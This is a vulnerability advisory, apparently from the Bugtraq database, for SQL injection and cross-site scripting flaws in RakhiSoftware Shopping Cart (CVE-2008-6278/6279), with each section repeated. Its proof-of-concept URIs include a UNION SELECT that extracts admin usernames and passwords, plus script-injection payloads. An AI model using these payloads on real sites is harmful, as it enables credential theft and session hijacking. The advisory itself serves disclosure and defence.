RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
BID:32563
Info
RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
| Bugtraq ID: | 32563 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6279 CVE-2008-6278 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 28 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | Charalambous Glafkos |
| Vulnerable: |
RakhiSoftware Shopping Cart 0 |
| Not Vulnerable: | |
Discussion
RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.
Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database.
RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.
Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
Attackers can exploit the issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URIs and proof of concept are available:
http://www.example.com/rjbike_new/product.php?category_id=1+union%20select%20 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21%20from%20admin--&subcategory_id=1
http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1
http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script>
Set Cookie: PHPSESSID='
Attackers can exploit the issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URIs and proof of concept are available:
http://www.example.com/rjbike_new/product.php?category_id=1+union%20select%20 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21%20from%20admin--&subcategory_id=1
http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1
http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script>
Set Cookie: PHPSESSID='
Solution / Fix
RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
References:
References:
- RakhiSoftware Homepage (RakhiSoftware)